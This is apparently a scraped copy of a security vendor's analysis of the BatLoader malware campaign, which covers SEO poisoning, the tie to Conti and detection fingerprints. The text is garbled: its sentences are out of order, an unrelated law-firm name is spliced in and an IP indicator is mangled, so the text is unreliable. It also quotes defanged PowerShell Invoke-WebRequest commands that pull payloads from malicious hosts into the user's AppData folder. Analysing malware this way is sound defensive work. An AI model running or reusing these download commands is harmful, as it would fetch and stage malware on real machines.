This is not to say that Conti is responsible for BatLoader. Mandiant had previously released research on BatLoader and commented that activity from BatLoader overlaps with techniques that were released with Conti’s leaks in August 2021. One of the techniques identified was the use of the Atera agent which has similarities to Conti’s previous techniques for their ransomware operations. Evidence collected includes an IP address (1340117195 – firsone1online) that was previously used by Conti in a ransomware campaign leveraging Log4J, as well as techniques that Conti has used in other attacks. While researching BatLoader, the team discovered several attributes within the attack chain that are similar to previous activity linked to Conti. Invoke-WebRequest hxxp://cloudupdatessscom Invoke-WebRequest hxxtps://updatea1com/g5 Set-Location “$Env:USERPROFILE\AppData\Roaming”
Other fingerprints pulled from the code can also be used to identify BatLoader files: 1 Table 1: OLE File information for identified Batloader samples
Kancelaria Adwokacka Adwokat Aleksandra Krzemińska The following can be used as a fingerprint to identify the malicious files (based on the OLE file information provided by VT): Author There are several attributes that are unique to BatLoader’s attack methodology that Carbon Black’s MDR team has seen in infected customer environments. In this article, we will explore this malware campaign, addressing the history of BatLoader, its attributes, how it is delivered, the infection chain, and Carbon Black’s detection of the malware. The use of living-off-the-land binaries makes this campaign hard to detect and block especially early on in the attack chain.
The threat actors utilize search engine optimization (SEO) poisoning to lure users to download the malware from compromised websites. Named by Mandiant, BatLoader is an initial access malware that heavily uses batch and PowerShell scripts to gain a foothold on a victim machine and deliver other malware. One such threat that has been particularly prevalent over the last couple of months is BatLoader. VMware Carbon Black Managed Detection and Response (MDR) analysts are constantly handling security incidents within our customer environments and tracking emerging and persistent malware campaigns. Contributors: Deborah Snyder and Nikki Benoit Executive Summary
0 kommentar(er)
